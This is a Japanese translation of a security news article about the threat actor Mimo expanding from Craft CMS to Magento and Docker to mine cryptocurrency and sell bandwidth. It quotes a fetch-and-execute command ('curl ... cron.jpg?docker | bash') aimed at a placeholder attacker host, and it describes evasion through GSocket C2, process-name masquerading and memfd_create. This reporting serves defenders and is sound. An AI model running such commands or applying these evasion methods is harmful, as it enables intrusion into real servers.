Threat Actor Mimo Attacking Magento CMS to Steal Card Details and Bandwidth Monetization
2025/07/24 CyberSecurityNews — これまで、Craft CMS を標的としてきた悪名高い脅威アクター Mimo が、Magento の eコマース・プラットフォームへの侵入活動を大幅に進化させており、サイバー・セキュリティ環境は新たな脅威に直面することになった。この活動の拡大が示すのは、日常的に金融データ情報を処理する高価値ターゲットへの危険なシフトであり、Mimo グループの犯罪活動が、懸念すべきエスカレーションを遂げていることを意味する。
最近の Mimo による攻撃活動は高度な技術力を伴っており、未確認の PHP-FPM の脆弱性を悪用することで、Magento へのイニシャル・アクセスを取得している。
この脅威アクターの多角的な収益化の戦略は、従来からの暗号通貨マイニングと、住宅用プロキシ・ネットワークを経由する帯域幅の窃取の組み合わせにより構築されている。
この二重の手法により、攻撃者は侵害したシステムから最大限の価値を引き出すと同時に、貴重な eコマース環境への継続的アクセスを維持できる。
DATADOG Security Labs の研究者たちが、こうした進化を確認したのは、2025年を通じて eコマースサイトに影響を与えた、複数のワークロード侵害を調査する最中だった。
このセキュリティ・チームが発見したのは、侵害したシステム内における脅威運用と存続期間を、Mimo が大幅に強化していることだった。つまり、Mimo は、標的範囲を拡大するだけではなく、高度な永続化メカニズムおよび洗練された回避手法を導入していることになる。
この脅威アクターの活動は、Magento プラットフォームを超えて拡大しており、Docker Engine API エンドポイントのミスコンフィグに起因する、Docker コンテナへの侵害を示す証拠も、研究者たちは確認した。
.webp)
Docker 環境を標的とする場合の Mimo は、”curl http://[adversary-controlled-infrastructure]/cron.jpg?docker | bash” コマンドを用いて感染チェーンを開始しており、多様なインフラ・タイプに対する適応性を示している。
高度な永続化と検出回避のためのメカニズム
Mimo の戦術における最も顕著な進展は、正規のペンテスト・ツールである GSocket を実装し、永続的な Command and Control チャネルを確立している点にある。
このツールは
AES-256-CBC 暗号化を用いて、Global Socket Relay Network による暗号化通信を実現する GSocket は、悪意のトラフィックを遮断するためのファイアウォールや NAT (network address translation) バリアを効果的に回避していく。
また、このマルウェアは、高度なプロセス・マスカレード技術を採用しており、kstrp/watchdogd/ksmd/kswapd0 などび、ハードコードされたリストから名称をランダムに選択し、正規カーネル・プロセスにシームレスに統合されていく。
おそらく、最も深刻な懸念は、Mimo が “memfd_create()” システムコールを実装している点である。このシステムコールは、メモリ内に匿名のテンポラリ・ファイルをダイレクトに生成し、セキュリティ・ツールが監視する従来型のファイル・システム・アーティファクトを残すことなく、マルウェアの完全な実行を可能にするものだ。
Mimo という脅威アクターが、Craft CMS から Magento や Docker などの高価値なターゲットへと、攻撃範囲を広げているようです。特に注目すべきは、PHP-FPM や Docker API の脆弱性を突いて初期アクセスを得ている点であり、ミスコンフィグや未知の脆弱性が侵入経路となっているようです。また、GSocket や memfd_create() の悪用により、検出を回避する高度な技術も備えていると、この記事は指摘しています。ご利用のチームは、ご注意ください。よろしければ、Magento で検索と、Docker で検索も、ご参照ください。
IoT OT Security News 
You must be logged in to post a comment.